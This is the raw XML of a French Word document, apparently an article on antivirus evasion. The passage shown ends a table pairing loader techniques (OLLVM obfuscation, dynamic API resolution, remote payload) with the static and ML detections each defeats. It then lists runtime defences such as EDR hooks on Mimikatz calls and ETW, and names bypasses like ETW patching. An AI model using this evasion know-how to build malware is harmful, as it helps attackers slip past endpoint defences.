            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C1804" w14:paraId="51311C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EA587" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OLLVM</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0DFAC" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Casser les signatures dans le code machine</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182BB" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Moteur de signatures classique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C1804" w14:paraId="10BEB7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25DCA" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Résolution dynamique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4EA2C" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Cacher les fonctions suspectes de l'IAT</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86104" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Modèle ML (combinaison d'imports)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C1804" w14:paraId="52A769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D71FB" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Payload</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> distant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AB3D3" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Supprimer le blob haute entropie du binaire</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1996B" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Modèle ML (entropie des sections)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B8ECAF8" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="000C1804">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="300D8F38" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Chaque couche seule est insuffisante. La détection statique moderne utilise à la fois les signatures classiques et le ML, et chaque mécanisme regarde des caractéristiques différentes du binaire. C'est l'empilement des couches qui rend le loader indétectable sur disque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133C2C64" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Limites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067FB207" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ce bypass ne concerne que la détection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>statique</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (analyse du fichier sur disque). Une fois le loader exécuté, d'autres mécanismes de défense restent actifs :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDD64C5" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="340" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•  Les </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>kernel callbacks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sont notifiés de la création du processus, du </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> thread, et du chargement des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DLLs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="276FDC8B" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="340" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•  Les </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>inline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hooks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sur ntdll.dll permettent à l'EDR de surveiller les appels système de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="096C8775" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="340" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ETW</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> continue de logger les événements mémoire et réseau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23954782" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="340" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•  La </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>détection comportementale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> peut corréler l'allocation RWX, le téléchargement réseau, et la modification du contexte thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E4FBF4" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="000C1804">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA27C2E" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le contournement de ces mécanismes nécessite des techniques complémentaires (Direct </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Syscall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fresh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> copy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ntdll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, ETW </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>patching</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, kernel callback </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>removal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) qui seront abordées dans de prochains articles.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000C18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9725E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8C24ACEE"/>
    <w:lvl w:ilvl="0" w:tplc="B15C8E4E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BA2E00B0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="C1009520">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="6FC6725A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="83CA5C08">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="1164849A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="85AEF792">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="1E006500">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="085AC904">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="377120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804"/>
    <w:rsid w:val="000C1804"/>
    <w:rsid w:val="0061036F"/>
    <w:rsid w:val="00D3544E"/>
    <w:rsid w:val="00E612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577C6"/>
  <w15:docId w15:val="{39CFD2A3-1384-47CE-ADD3-BA0E536FE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1F1F"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre2">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="300" w:after="160"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="333333"/>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1136</Words>
  <Characters>6251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Chemse-Eddine TIMAKSSAT</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-21T21:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-22T09:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>